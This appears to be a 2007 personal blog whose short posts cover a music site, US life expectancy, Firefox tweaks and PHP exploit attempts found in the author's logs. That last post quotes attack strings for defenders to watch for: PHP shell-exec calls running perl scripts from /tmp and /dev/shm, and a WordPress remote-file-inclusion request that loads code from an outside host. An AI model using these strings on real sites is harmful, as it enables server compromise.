what’s an indaba and why do I want one?

Anyone know anything about Indaba? Want to play in that sandbox?:

Well, this looks interesting. Lots of people doing their musical thing, in all kinds of creative ways. Maybe there’s room for undisciplined folks like me?

I have to say that listening to some of the other contributions is a great motivator: I can leave my 4 track (two loops, two real instruments)/first take Garageband noise up for now, but surely I can do better.

The track I posted is as bad as it gets, so it’s all upside. Check it out.

why he’s the worst

The young’uns were asking why exactly we grownups think so badly of the president. We mostly focused on the war(s), how long they have lasted, how wasteful, and in the case of Iraq, how unjustified.

But I didn’t know that we doing this badly in something we all have taken for granted. People in Jordan have a longer life expectancy than Americans, as a result of different healthcare policies?:

The AP reports that while Americans are living longer than ever, they are not living as long as people in 41 other countries, including Japan, Guam, Jordan, and most nations in Europe. “A baby born in the United States in 2004 will live an average of 77.9 years. That life expectancy ranks 42nd, down from 11th two decades earlier.”

 Wp-Content Uploads 2007 08 Capt365626C0779F47Feb981E4Faab7B995Alife Expectancy Gfx439-1

A New York Times editorial today writes that the “disturbing truth” is that “by an array of pertinent yardsticks, the United States is a laggard not a leader in providing good medical care.”

more php exploit attempts

look for this “http://sslsystem.webpark.pl/center/base?” in your logfiles as some idiots try to run a variety of commands on targeted systems.

system(“perl /tmp/.temp_04128”);
passthru(“perl /tmp/.temp_04128”);
exec(“perl /tmp/.temp_04128”);
shell_exec(“perl /tmp/.temp_04128”);
system(“perl /dev/shm/.temp_04128”);
passthru(“perl /dev/shm/.temp_04128”);
exec(“perl /dev/shm/.temp_04128”);
shell_exec(“perl /dev/shm/.temp_04128”);

there’s a thread here that mentions it, but I’m not sure it’s the same thing. The tech support folks don’t exactly show lot of enthusiasm for finding out what’s happening. I mean, no one should be passing shell commands for things that live in /tmp

and more:

GET /wordpress/index.php//index.php?template=http://usuarios.arnet.com.ar/larry123/safe.txt?

links for 2007-08-12

when the comments are better than the content

Firefox is made much more Foxy with these tweaks.

No, it’s not just you. Firefox sucks nuts on the Mac. These seem to help.


Tweak Firefox’s rendering settings

This second requires you to add a file that doesn’t exist in a stock configuration. It’s called user.js which on my system lives in the same place as MochiKit. So find that directory and create file called user.js that contains one line (for now):

user_pref("nglayout.initialpaint.delay", 0);

You may find stuff to add later, but at least you have the file now.